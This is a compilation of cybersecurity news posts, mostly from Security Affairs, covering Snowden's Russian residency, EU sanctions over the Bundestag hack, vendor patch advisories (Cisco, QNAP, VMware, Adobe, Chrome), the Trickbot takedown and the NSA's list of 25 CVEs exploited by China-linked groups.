The former CIA employee and National Security Agency contractor Edward Snowden (37) has been granted permanent residency in Russia, his lawyer announced on Thursday.

In 2013, Edward Snowden shed the light on the mass surveillance program operated by the US government to spy on its citizens and allies.

The man expressed his desire to return to the United States where he is considered a criminal and a threat to homeland security due to his revelation. Snowden is wanted in the United States on espionage charges after he revealed details on the surveillance apparatus used by the National Security Agency (NSA) to collect telephone records of millions of US citizens. 

According to his lawyer Anatoly Kucherena, Snowden’s residency permit was extended as the result of recent changes introduced to Russia’s immigration law. The residency permit and is now indefinite, as reported by AFP press.

“Kucherena said it was “natural” that Snowden wanted to return to the United States but will only do so when the case against him is closed.” reported AFP.

Edward snowden

The application was filed in April, but the decision of the Russian authorities was made public only this week due to a delay in the process caused by the ongoing COVID-19 pandemic.

It is not clear if Snowden plans to apply for Russian citizenship.

Earlier this year, US President Donald Trump announced that he was evaluating the possibility of pardoning Snowden but he did not provide further details on the case. 

In 2015 the White House rejected a petition calling on then-president Barack Obama to pardon the popular US whistleblower.

In September 2019, the US DoJ filed a lawsuit against Edward Snowden to prevent the former CIA employee and National Security Agency contractor from receiving the payment for his book, Permanent Record.

According to the civil lawsuit, filed in the Eastern District of Virginia, Snowden violated non-disclosure agreements signed when he was an employee at the US intelligence agencies.

Pierluigi Paganini

(SecurityAffairs – hacking, Snowden)

The post US whistleblower Edward Snowden received permanent residency by Russian authorities appeared first on Security Affairs.

EU Council sanctions two Russian military intelligence officers over 2015 Bundestag hack

The Council of the European Union announced sanctions imposed on Russian military intelligence officers for 2015 Bundestag hack.

The Council of the European Union announced sanctions imposed on Russian military intelligence officers, belonging to the 85th Main Centre for Special Services (GTsSS), for their role in the 2015 attack on the German Federal Parliament (Deutscher Bundestag).

The 85th Main Centre for Special Services (GTsSS) is the military unit of the Russian government also tracked as APT28  (aka Fancy BearPawn StormSofacy GroupSednit, and STRONTIUM).

The APT28 group (aka Fancy BearPawn StormSofacy GroupSednit, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

“The Council today imposed restrictive measures on two individuals and one body that were responsible for or took part in the cyber-attack on the German Federal Parliament (Deutscher Bundestag) in April and May 2015.” reads the press release published by the Council. “This cyber-attack targeted the parliament’s information system and affected its ability to operate for several days. A significant amount of data was stolen and the email accounts of several members of parliament, including that of Chancellor Angela Merkel, were affected.”

Immediately after the attack the daily Der Spiegel speculated that the Russian Government was behind the attack.  

Bundestag German politicians

The attackers used a sophisticated strain of malware to violated the Bundestag network and syphoned sensitive data. The experts that analyzed the malicious code employed in the hack found many similarities with a piece of malware used in a previous attack against a German Government network that took place in 2014.

“The cyber attack on the “Parlakom” network was discovered in early May. At the parliamentary IT network 20,000 Bundestag accounts are connected – including German Chancellor Angela Merkel and other government officials.” continues the Der Spiegel.

EU’s sanctions imposed on Russian military officers include travel bans and asset freezes, they also block EU organizations and individuals from transferring funds to sanctioned entities and individuals.

The Council’s sanctions target a total of 8 persons and 4 entities and bodies.

“Sanctions are one of the options available in the Union’s framework for a joint diplomatic response to malicious cyber activities (the so-called cyber diplomacy toolbox), and are intended to prevent, discourage, deter and respond to continuing and increasing malicious behaviour in cyberspace,” a press release published earlier reads. “The relevant legal acts, including the names of the individuals and the body concerned, have been published in the Official Journal.”

Two of the officers sanctioned by the Council of the European Union are Dmitry Sergeyevich Badin and Igor Olegovich Kostyukov are known members of the GTsSS.

The two officers were also indicted by US DoJ in October 2018, along with other five members of the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.

Kostyukov was also reached by an executive order issued by President Barack Obama in 2016 to impose sanctions on a number of Russian military and intelligence officials in response to the alleged hacking campaigns against the 2016 US Presidential Election.

Kostyukov is the current chief of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU/GRU).

“In this capacity, Igor Kostyukov is responsible for cyber-attacks carried out by the GTsSS, including those with a significant effect constituting an external threat to the Union or its Member States,” states the Council. “In particular, military intelligence officers of the GTsSS took part in the cyber-attack against the German federal parliament (Deutscher Bundestag) which took place in April and May 2015 and the attempted cyber-attack aimed at hacking into the Wi-Fi network of the Organisation for the Prohibition of Chemical Weapons (OPCW) in the Netherlands in April 2018.”

In July 2020, for the first-ever time, the EU has imposed economical sanctions on Russia, China, and North Korea following cyber-attacks aimed at the EU and its member states.

The EU Council announced sanctions imposed on a Russia-linked military espionage unit, as well as companies operating for Chinese and North Korean threat actors that launched cyber-attacks against the EU and its member states.

The sanctions were imposed as part of a legal framework established on May 17, 2019, which allows the EU to impose targeted restrictive measures to deter and respond to cyber-attacks aimed at the EU or its member states.

Pierluigi Paganini

(SecurityAffairs – hacking, Bundestag)

The post EU Council sanctions two Russian military intelligence officers over 2015 Bundestag hack appeared first on Security Affairs.

Cisco addresses 17 high-severity flaws in security appliances

Security Advisory Bundled Publication for October 2020 – Cisco announced the release of patches for 17 high-severity flaws in its security appliances.

Cisco announced the release of security patches for 17 high-severity vulnerabilities in its security appliances as part of its Security Advisory Bundled Publication for October 2020.

The vulnerability impacts Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC).

“The October 21, 2020 release of the ASA, FMC, and FTD Software Security Advisory Bundled Publication includes 17 Security Advisories that describe 17 vulnerabilities in ASA, FMC, and FTD Software. Cisco has released software updates for these vulnerabilities.” states the advisory.

“All of these vulnerabilities have a Security Impact Rating (SIR) of High.”

Most of the vulnerability addressed by the IT giant can be exploited by remote, unauthenticated attackers. The list of addressed vulnerabilities includes denial-of-service (DoS), CSRF, FMC authentication bypass, and MitM issues.

The company also fixed multiple vulnerabilities that require local access or authentication to be exploited, an attacker can trigger them to read or write files on a device, cause a DoS condition, bypass the secure boot mechanism, and escape containers and execute commands with root privileges.

The good news is that Cisco is not aware of attacks in the wild exploiting these vulnerabilities.

Cisco is also warning of attacks targeting the CVE-2020-3118 high severity vulnerability that affects multiple carrier-grade routers running the Cisco IOS XR Software.

The flaw resides in the Discovery Protocol implementation for Cisco IOS XR Software and could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a reload an affected device.

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Cisco addresses 17 high-severity flaws in security appliances appeared first on Security Affairs.

Taiwanese vendor QNAP issues advisory on Zerologon flaw

Taiwanese vendor QNAP published an advisory to warn customers that certain versions of its NAS OS (QTS) are affected by the Zerologon vulnerability.

The Taiwanese vendor QNAP has published an advisory to warn customers that certain versions of the operating system for its network-attached storage (NAS) devices, also known as of QTS, are affected by the Zerologon vulnerability (CVE-2020-1472).

The CVE-2020-1472 flaw is an elevation of privilege that resides in the Netlogon. The Netlogon service is an Authentication Mechanism used in the Windows Client Authentication Architecture which verifies logon requests, and it registers, authenticates, and locates Domain Controllers.

Administrators of enterprise Windows Servers have to install the August 2020 Patch Tuesday to mitigate “unacceptable risk” posed by the flaw to federal networks.

An attacker could also exploit the flaw to disable security features in the Netlogon authentication process and change a computer’s password on the domain controller’s Active Directory.

The only limitation on how to carry out a Zerologon attack is that the attacker must have access to the target network.

The flaw was discovered by researchers from the security firm Secura that also published technical details of the issue along with proof-of-concept exploits.

On September 18, the US CISA issued an Emergency Directive requiring federal agencies to install the available patches within three days.

Threat actors immediately started targeting the vulnerability in attacks in the wild, including Iranian APT groups and at least a Russian cybercrime gang.

QNAP already released security updates to address the Zerologon flaw in its products to prevent that attackers will use its NAS devices to take over entire networks.

“The Zerologon vulnerability has been reported to affect some versions of QTS.” reads the advisory issued by the vendor. “If exploited, this elevation of privilege vulnerability allows remote attackers to bypass security measures via a compromised QTS device on the network.”

Threat actors can exploit the issue in the NAS if users have configured the device as a domain controller in Control Panel > Network & File Services > Win/Mac/NFS > Microsoft Networking.

QNAP has already addressed the Zerologon vulnerability in the following software versions:

  • QTS 4.5.1.1456 build 20201015 and later
  • QTS 4.4.3.1439 build 20200925 and later
  • QTS 4.3.6.1446 Build 20200929 and later
  • QTS 4.3.4.1463 build 20201006 and later
  • QTS 4.3.3.1432 build 20201006 and later

The company pointed out that QTS 2.x and QES are not affected by this flaw.

QSnatch QNAP

QNAP users are advised to update QTS to the latest available version and to ensure that all other applications on their devices are up to date.

QNAP’s advisory also includes details on how to install the QTS Update and to update all installed applications.

Pierluigi Paganini

(SecurityAffairs – hacking, QNap)

The post Taiwanese vendor QNAP issues advisory on Zerologon flaw appeared first on Security Affairs.

Sopra Steria hit by cyber attack. IT services group suspected of falling victim to ransomware

European IT services group Sopra Steria has been hit by a cyber attack. Which would be unfortunate for any business at the best of times, but is possibly even more galling for a firm like Sopra Steria which has a specialist cybersecurity branch which claims to help customers “protect sensitive information, and prevent costly data breaches.”

ENISA Threat Landscape Report 2020

According to the ENISA Threat Landscape Report 2020, cyberattacks are becoming more sophisticated, targeted, and in many cases undetected.

I’m proud to present the ENISA Threat Landscape Report 2020, the annual report published by the ENISA that provides insights on the evolution of cyber threats for the period January 2019-April 2020.

The 8th annual ENISA Threat Landscape (ETL) report was compiled by the European Union Agency for Cybersecurity (ENISA), with the support of the European Commission, EU Member States and the CTI Stakeholders Group.

It is an amazing work that identifies and evaluates the top cyber threats for the period January 2019-April 2020.

This year the report has a different format that could allow the readers to focus on the threat of interest. The publication is divided into 22 different reports, which are available in both pdf form and ebook form.

The report provides details on threats that characterized the period of the analysis and highlights the major change from the 2018 threat landscape as the COVID-19-led transformation of the digital environment.

“During the pandemic, cyber criminals have been seen advancing their capabilities, adapting quickly and targeting relevant victim groups more effectively. (Infographic – Threat Landscape Mapping during COVID-19). states the report.

ENISA Threat Landscape Report 2020

The ETL report provides strategic and technical analysis of the events, it was created to provide relevant information to both technical and non-technical readers.

For a better understanding of how the ETL is structured, we recommend the initial reading of “The Year in Review” report, the following table could help readers to focus on the section of their interest included in the publication.

The report highlights the importance of cyber threat intelligence to respond to increasingly automated attacks leveraging automated tools and skills.

Another element of concern is the diffusion of IoT devices, in many cases, smart objects are exposed online without protection.

Below the main trends reported in the document:

  • Attack surface in cybersecurity continues to expand as we are entering a new phase of the digital transformation.
  • There will be a new social and economic norm after the COVID-19 pandemic even more dependent on a secure and reliable cyberspace.
  • The use of social media platforms in targeted attacks is a serious trend and reaches different domains and types of threats.
  • Finely targeted and persistent attacks on highvalue data (e.g. intellectual property and state secrets) are being meticulously planned and executed by state-sponsored actors.
  • Massively distributed attacks with a short duration and wide impact are used with multiple objectives such as credential theft.
  • The motivation behind the majority of cyberattacks is still financial.
  • Ransomware remains widespread with costly consequences to many organisations.
  • Still many cybersecurity incidents go unnoticed or take a long time to be detected.
  • With more security automation, organisations will be invest more in preparedness using Cyber Threat Intelligence as its main capability.
  • The number of phishing victims continues to grow since it exploits the human dimension being the weakest link.

Let me close with the Top Threats 2020, for each threat the report includes detailed information on trends and observed evolution.

ENISA Threat Landscape Report 2020 2

Enjoy it!

Pierluigi Paganini

(SecurityAffairs – hacking, ENISA Threat Landscape Report 2020)

The post ENISA Threat Landscape Report 2020 appeared first on Security Affairs.

VMware fixes several flaws in its ESXi, Workstation, Fusion and NSX-T

VMware patched several flaws in its ESXi, Workstation, Fusion and NSX-T products, including a critical code execution vulnerability.

VMware has fixed several vulnerabilities in its ESXi, Workstation, Fusion and NSX-T products, including a critical flaw that allows arbitrary code execution.

The critical vulnerability, tracked as CVE-2020-3992, is a use-after-free issue that affects the OpenSLP service in ESXi. The vulnerability can allow remote attackers to execute arbitrary code on affected installations of the ESXi product.

The attacker can exploit the flaw needs to be on the management network and have access to port 427 on an ESXi machine in order to exploit the vulnerability.

“OpenSLP as used in ESXi has a use-after-free issue. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the advisory published by VMware.

“A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution.”

The vulnerability was reported to VMware on July 22 by Lucas Leong (@_wmliang_) from Trend Micro’s Zero Day Initiative.

The virtualization giant addressed the vulnerability in ESXi and VMware Cloud Foundation.

The company also patched a high-severity flaw in NSX-T, tracked as CVE-2020-3993, which is caused by the way a KVM host is allowed to download and install packages from the NSX manager. The flaw could be exploited by a MitM attacker to compromise transport nodes.

“VMware NSX-T contains a security vulnerability that exists in the way it allows a KVM host to download and install packages from NSX manager. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5.” reads the advisory.

“A malicious actor with MITM positioning may be able to exploit this issue to compromise the transport node.”

The researchers Reno Robert discovered an out-of-bounds read vulnerability in VMware ESXi, Workstation and Fusion. The issue is due to a time-of-check time-of-use issue in ACPI device.

An attacker with administrative access to a virtual machine may be able to exploit this flaw to leak memory from the vmx process.

VMware also addressed a vulnerability, tracked as CVE-2020-3994, in the vCenter Server session hijack vulnerability in the update function.

“A malicious actor with network positioning between vCenter Server and an update repository may be able to perform a session hijack when the vCenter Server Appliance Management Interface is used to download vCenter updates.” reads the advisory.

The vulnerability was repored by Thorsten Tüllmann of the Karlsruhe Institute of Technology.

Pierluigi Paganini

(SecurityAffairs – hacking, VMware)

The post VMware fixes several flaws in its ESXi, Workstation, Fusion and NSX-T appeared first on Security Affairs.

How tech trends and risks shape organizations’ data protection strategy

Trustwave released a report which depicts how technology trends, compromise risks and regulations are shaping how organizations’ data is stored and protected. Data protection strategy The report is based on a recent survey of 966 full-time IT professionals who are cybersecurity decision makers or security influencers within their organizations. Over 75% of respondents work in organizations with over 500 employees in key geographic regions including the U.S., U.K., Australia and Singapore. “Data drives the global … More

The post How tech trends and risks shape organizations’ data protection strategy appeared first on Help Net Security.

Smashing Security podcast #201: Robin Hood, Flippy, and the web ad bubble

The Darkside ransomware gang thinks it's a modern-day Robin Hood when it donates extorted Bitcoins to charity, the micro-targeted ad industry could pop like a bubble, and would you trust a burger-flipping robot? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Tim Hwang.

Adobe releases a new set of out-of-band patches for its products

Adobe has released a second out-of-band security update to address critical vulnerabilities affecting several products. 

Adobe has released a second out-of-band security update to fix critical vulnerabilities that impact numerous products of the IT giant. 

The flaws impact Adobe Illustrator, Dreamweaver, Marketo, Animate, After Effects, Photoshop, Premiere Pro, Media Encoder, InDesign, and the Creative Cloud desktop application on Windows and macOS machines. 

Adobe has released seven critical vulnerabilities in Illustrator, including memory corruption and out of bounds read/write issues that can lead to arbitrary code execution. 

Below the vulnerability details:

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Out-of-Bounds Read


Arbitrary code execution  CriticalCVE-2020-24409
CVE-2020-24410
Out-of-Bounds WriteArbitrary code execution 


Critical


CVE-2020-24411
Memory Corruption    Arbitrary Code Execution    Critical CVE-2020-24412
CVE-2020-24413
CVE-2020-24414
CVE-2020-24415

Adobe has addressed an “important” uncontrolled search path element security flaw in Dreamweaver which could be exploited by attackers to escalate privilege.

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Uncontrolled Search Path Element
Privilege Escalation ImportantCVE-2020-24425

The company fixed four critical vulnerabilities in Animate, they are out-of-bounds read, stack overflow, and double-free flaws that can result in arbitrary code execution.  

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Double-freeArbitrary code executionCriticalCVE-2020-9747
Stack-based buffer overflowArbitrary code executionCriticalCVE-2020-9748
Out-of-bounds readArbitrary code executionCriticalCVE-2020-9749
CVE-2020-9750

Adobe addressed an “important” XSS issue impacting the Marketo Sales Insight Salesforce package that could have been weaponized to deploy malicious JavaScript in a browser session. 

 Vulnerability Category Vulnerability ImpactSeverityCVE numbers
Cross-site Scripting (stored) JavaScript execution in the browserImportantCVE-2020-24416

The company addressed

Vulnerability details

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Out-of-Bounds Read Arbitrary Code Execution     Critical  CVE-2020-24418
Uncontrolled search pathArbitrary Code Execution       CriticalCVE-2020-24419

Adobe addressed a single out-of-bounds read and an uncontrolled search path critial flaws in After Effects that could lead to the execution of malicious code are now patched. 

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Out-of-Bounds Read Arbitrary Code Execution     Critical  CVE-2020-24418
Uncontrolled search pathArbitrary Code Execution       CriticalCVE-2020-24419

Adobe has fixed a critical memory corruption flaw in InDesign that could also be exploited to execute arbitrary code. 

Vulnerability CategoryVulnerability ImpactSeverityCVE Number
Memory Corruption Arbitrary Code ExecutionCriticalCVE-2020-24421

The company also fixed other critical uncontrolled search path issues in PhotoshopPremiere ProMedia Encoder, and Creative Cloud installer for desktop.

Last week, Adobe released a separate set of out-of-band security patches affecting the Magento platform.

Pierluigi Paganini

(SecurityAffairs – hacking, code execution)

The post Adobe releases a new set of out-of-band patches for its products appeared first on Security Affairs.

Sweden bans Huawei and ZTE from building its 5G infrastructure

Sweden is banning Chinese tech giant Huawei and ZTE from building new 5G wireless networks due to national security concerns.

Another state, Sweden, announced the ban of Chinese tech companies Huawei and ZTE from building its 5G network infrastructure.

The Swedish Post and Telecom Authority announced this week that four wireless carriers bidding for frequencies in an upcoming spectrum auction for the new 5G networks (Hi3G Access, Net4Mobility, Telia Sverige and Teracom) cannot use network equipment from the Chinese firms.

The Swedish telecom regulator is also urging carriers to replace any existing equipment from Huawei or ZTE by January 1st, 2025, at the latest.

The decision is the result of assessments made by the Swedish military and security service.

“In accordance with new legislation, which entered into force on 1 January 2020, an examination of applications has been conducted in consultation with the Swedish Armed Forces and the Swedish Security Service, to ensure that the use of radio equipment in these bands does not cause harm to Sweden´s security.” reads a press release published by the Swedish Post and Telecom Authority.

The ban aims at new installations and new implementation of central functions for the radio use in the frequency bands.

Sweden is the latest country to ban Huawei from participating in building 5G networks.

Recently Belgian telecoms operators Orange Belgium and Proximus announced that it will gradually replace the equipment from the Chinese manufacturer Huawei.

Huawei ban

The U.S. is pushing its allies for banning Huawei, ZTE and other Chinese companies, Washington highlighted the risks for national security in case of adoption of Huawei equipment and is urging internet providers and telco operators in allied countries to ban Chinese firms.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United StatesAustraliaNew ZealandRomania, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

In April 2018, the UK GCHQ intelligence agency warned UK telcos firms of the risks of using ZTE equipment and services for their infrastructure.

In December 2018, a Czech cyber-security agency is warned against using Huawei and ZTE technologies because they pose a threat to state security.

In September, the US Federal Communications Commission (FCC) estimated the cost of a full replacement of all Huawei and ZTE hardware on American wireless networks at $1.837bn.

Klas Friberg, the head of Sweden’s domestic security service (SAPO) declared that foreign states have intensified their intelligence activity and the protection of 5G networks from cyber espionage and hacking campaign from threat actors is crucial for homeland security.

“China is one of the biggest threats to Sweden,” Friberg said. “The Chinese state is conducting cyber espionage to promote its own economic development and develop its military capabilities. This is done through extensive intelligence gathering and theft of technology, research and development. This is what we must consider when building the 5G network of the future.”

Huawei was “surprised and disappointed” by the decision of the Swedish authority.

“Huawei has never caused even the slightest shred of threat to Swedish cyber security and never will,” reads a statement from the Chinese giant Huawei. “Excluding Huawei will not make Swedish 5G networks any more secure. Rather, competition and innovation will be severely hindered.

Pierluigi Paganini

(SecurityAffairs – hacking, 5G)

The post Sweden bans Huawei and ZTE from building its 5G infrastructure appeared first on Security Affairs.

Chrome 86.0.4240.111 fixes actively exploited CVE-2020-15999 zero-day

Google has released Chrome version 86.0.4240.111 that also addresses the CVE-2020-15999 flaw which is an actively exploited zero-day.

Google has released Chrome version 86.0.4240.111 that includes security fixes for several issues, including a patch for an actively exploited zero-day vulnerability tracked as CVE-2020-15999.

The CVE-2020-15999 flaw is a memory corruption bug that resides in the FreeType font rendering library, which is included in standard Chrome releases.

White hat hackers from the Google Project Zero team spotted attacks exploiting the vulnerability in the wild.

The researchers did not disclose technical details about the attacks exploiting the CVE-2020-15999 in the wild to avoid mass exploitation from threat actors.

Google Project Zero is recommending other app development teams who use the same FreeType library to update their software as well.

The FreeType version 2.10.4 address this issue.

Chrome users can update their install to v86.0.4240.111 via the browser’s built-in update function.

Experts pointed out that since the patch for this zero-day is visible in the source code of the FreeType open-source library, threat actors will be able to make a reverse-engineering of the code and develop working exploits for the issue.

In the recent twelve months, Google addressed another two zero-day vulnerabilities tracked as CVE-2019-13720 (Oct. 2019) and CVE-2020-6418 (Feb. 2020) respectively

Pierluigi Paganini

(SecurityAffairs – hacking, Chrome)

The post Chrome 86.0.4240.111 fixes actively exploited CVE-2020-15999 zero-day appeared first on Security Affairs.

Microsoft took down 120 of 128 Trickbot servers in recent takedown

Microsoft brought down TrickBot infrastructure last week, but a few days later the botmasters set up a new command and control (C&C) servers.

Microsoft’s Defender team, FS-ISACESETLumen’s Black Lotus LabsNTT, and Broadcom’s cyber-security division Symantec joined the forces and announced last week a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.

Even if Microsoft and its partners have brought down the TrickBot infrastructure TrickBot operators attempted to resume the operations by setting up new command and control (C&C) servers online.

TrickBot botnet

Microsoft provided an update on its takedown efforts and announced a new wave of takedown actions against TrickBot.

According to the IT giant, the operation conducted last week has taken down 94% of the servers composing the Trickbot infrastructure. Trickbot enables ransomware attacks which have been identified as one of the biggest threats to the upcoming U.S. elections. 

“We initially identified 69 servers around the world that were core to Trickbot’s operations, and we disabled 62 of them. The seven remaining servers are not traditional command-and-control servers but rather internet of things (IoT) devices Trickbot infected and was using as part of its server infrastructure; these are in the process of being disabled. As expected, the criminals operating Trickbot scrambled to replace the infrastructure we initially disabled. We tracked this activity closely and identified 59 new servers they attempted to add to their infrastructure.” said Tom Burt, CVP of Customer Security and Trust at Microsoft. “We’ve now disabled all but one of these new servers. In sum, from the time we began our operation until October 18, we have taken down 120 of the 128 servers we identified as Trickbot infrastructure around the world.”

Microsoft has taken down 120 of the 128 servers that were composing the Trickbot infrastructure.

Microsoft announced to have taken down 62 of the original 69 TrickBot C&C servers, seven servers that could not be brought down last week were Internet of Things (IoT) devices.

Microsoft also revealed that operators tried to resume the operations, The company brought down 58 of the 59 servers the operators attempted to bring online after the recent takedown.

Burt praised the role of Microsoft’s lawyers who quickly requested new court orders to take down the new servers set up by the Trickbot operators in response to the takedown.

“We have identified new Trickbot servers, located their respective hosting provider, determined the proper legal methodology to take action, and completely disabled those servers in less than three hours. Our global coordination has allowed a provider to take quick action as soon as we notify them – in one case, in less than six minutes.” continues the expert. “What we’re seeing suggests Trickbot’s main focus has become setting up new infrastructure, rather than initiating fresh attacks, and it has had to turn elsewhere for operational help.”

Currently, a few Trickbot C2 servers are still active and operators are using them to control the botnet. Researchers from cyber-security firm Intel 471 reported that these servers are based in Brazil, Colombia, Indonesia, and Kyrgyzstan, and that they still are able to respond to Trickbot bot requests.

“This small number of working control servers was not listed in the most recent distributed Trickbot sample.” states Intel 471.

Burt pointed out that TrickBot operators are working to restore their infrastructure instead of conducting new attacks.

“We fully expect that Trickbot’s operators will continue looking for ways to stay operational, and we and our partners will continue to monitor them and take action.” Microsoft concludes. “We encourage others in the security community who believe in protecting the elections to join the effort and share their intelligence directly with hosting providers and ISPs that can take Trickbot’s infrastructure offline.”

Pierluigi Paganini

(SecurityAffairs – hacking, botnet)

The post Microsoft took down 120 of 128 Trickbot servers in recent takedown appeared first on Security Affairs.

NSA details top 25 flaws exploited by China-linked hackers

The US National Security Agency (NSA) has shared the list of top 25 vulnerabilities exploited by Chinese state-sponsored hacking groups in attacks in the wild.

The US National Security Agency (NSA) has published a report that includes details of the top 25 vulnerabilities that are currently being exploited by China-linked APT groups in attacks in the wild.

The knowledge of these vulnerabilities could allow IT and security staffs at organizations worldwide to protect their infrastructure against Chinese state-sponsored hacking campaigns.

The report includes well known vulnerabilites that have been already addressed by their vendors.

“This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks.” reads the report. “The majority of the products are either for remote access (T1133)1 or for external web services (T1190), and should be prioritized for immediate patching.”

The report includes a description of the vulnerability and the recommended mitigations.

The exploits for many of these vulnerabilities are publicly available and are employed by multiple threat actors, including China-linked hackers, in attacks in the wild.

The majority of the vulnerabilities can be exploited to gain initial access to the target networks, they affect systems that are directly accessible from the Internet, such as firewalls and gateways.

NSA confirmed that it is aware that National Security Systems, Defense Industrial Base, and Department of Defense networks are consistently scanned, targeted, and exploited by Chinese state-sponsored cyber actors. The US agency recommends that critical system owners will address the above vulnerabilities to mitigate the risk of loss of sensitive information that could have a significant impact on U.S. policies, strategies, plans, and competitive advantage.

The

These include:

1) CVE-2019-11510 – In Pulse Secure VPNs, ® 7 an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. This may lead to exposure of keys or passwords.

2) CVE-2020-5902– In F5 BIG-IP® 8 proxy / load balancer devices, the Traffic Management User Interface (TMUI) – also referred to as the Configuration utility – has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

3) CVE-2019-19781 – An issue was discovered in Citrix® 9 Application Delivery Controller (ADC) and Gateway. They allow directory traversal, which can lead to remote code execution without credentials.

4+5+6) CVE-2020-8193CVE-2020-8195CVE-2020-8196– Improper access control and input validation, in Citrix® ADC and Citrix® Gateway and Citrix® SDWAN WAN-OP, allows unauthenticated access to certain URL endpoints and information disclosure to low-privileged users

7) CVE-2019-0708 (aka BlueKeep) – A remote code execution vulnerability exists within Remote Desktop Services®10 when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests

8) CVE-2020-15505 – A remote code execution vulnerability in the MobileIron®13 mobile device management (MDM) software that allows remote attackers to execute arbitrary code and take over remote company servers.

9) CVE-2020-1350 (aka SIGRed– A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests.

10) CVE-2020-1472 (aka Netlogon) – An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC).

11) CVE-2019-1040 – A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection.

12) CVE-2018-6789 – Sending a handcrafted message to an Exim mail transfer agent may cause a buffer overflow. This can be used to execute code remotely and take over email servers.

13) CVE-2020-0688 – A Microsoft Exchange® validation key remote code execution vulnerability exists when the software fails to properly handle objects in memory

14) CVE-2018-4939 – Certain Adobe ColdFusion versions have an exploitable Deserialization of Untrusted Data vulnerability. Successful exploitation could lead to arbitrary code execution.

15) CVE-2015-4852 – The WLS Security component in Oracle WebLogic 15 Server allows remote attackers to execute arbitrary commands via a crafted serialized Java object

16) CVE-2020-2555 – A vulnerability exists in the Oracle Coherence product of Oracle Fusion Middleware. This easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence systems.

17) CVE-2019-3396– The Widget Connector macro in Atlassian Confluence 17 Server allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

18) CVE-2019-11580 – Attackers who can send requests to an Atlassian Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution.

19) CVE-2020-10189 – Zoho ManageEngine Desktop Central allows remote code execution because of deserialization of untrusted data.

20) CVE-2019-18935 – Progress Telerik UI for ASP.NET AJAX contains a .NET deserialization vulnerability. Exploitation can result in remote code execution.

21) CVE-2020-0601 (aka CurveBall) – A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.

22) CVE-2019-0803– An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory.

23) CVE-2017-6327– The Symantec Messaging Gateway can encounter a remote code execution issue.

24) CVE-2020-3118 – A vulnerability in the Cisco Discovery Protocol implementation for Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a reload an affected device.

25) CVE-2020-8515 – DrayTek Vigor devices allow remote code execution as root (without authentication) via shell metacharacters.

Pierluigi Paganini

(SecurityAffairs – hacking, NSA)

The post NSA details top 25 flaws exploited by China-linked hackers appeared first on Security Affairs.

How Automation can help you in Managing Data Privacy

The global data privacy landscape is changing and everyday we can see new regulations emerge.

These regulations are encouraging organizations to be better custodians of the consumers data and create a healthier space for data privacy. In order to do so organizations will need to rework their operations and revamp their processes in order to comply with these regulations.

According to a report by the International Association of Privacy Professionals, 33% of respondents have considered revamping their technology solutions around data privacy. This is where data privacy comes into play and organizations are looking for data privacy management softwares that can fulfill their data privacy needs, while complying with data regulations in order to avoid fines.

Tracking Personal Data

Data is stored in a plethora of internal and external systems in structured or unstructured form all across the organization. These systems can even spread over a geographical area depending on the size of the organization. In order to retrieve information, manual methods can be seen as tedious and time-consuming, not to mention the factor of human error.

According to Aoife Harney, Compliance Manager at AON, “One of the most important aspects of any data protection program is having an in-depth and documented knowledge of the what, the why, the where, the who, and the how.”

Different data privacy softwares that incorporate data intelligence serve various purposes in the organization. Certain softwares deal with cookies and consent, while others could focus on breach notification.

Now a days, organizations need all in one privacy management software platform that can address all these requirements and integrate data privacy within all their operations:

Compliance Requirements

Data privacy regulations such as the CCPA and GDPR require organizations to take responsibility for their consumers’ data. All data privacy regulations impose obligations on businesses for the protection of privacy of consumers by restricting data capture mechanisms, providing privacy rights to consumers on their personal data and introducing accountability in businesses data policies. Furthermore it imposes responsibilities on data controllers who store and hold data to protect it from unauthorized disclosures and to inform consumers when and if their data is breached.

In order to comply with these obligations organizations need to revamp the following practices to stay in compliance with global data privacy regulations.

  • DSR Fulfillment: Organizations will be met with a plethora of Data Subject requests and will be required to fulfill them all in a specific time frame based on the regulations they are required to comply with. In order to make this process swift and seamless, organizations will have to automate their DSR fulfillment process.
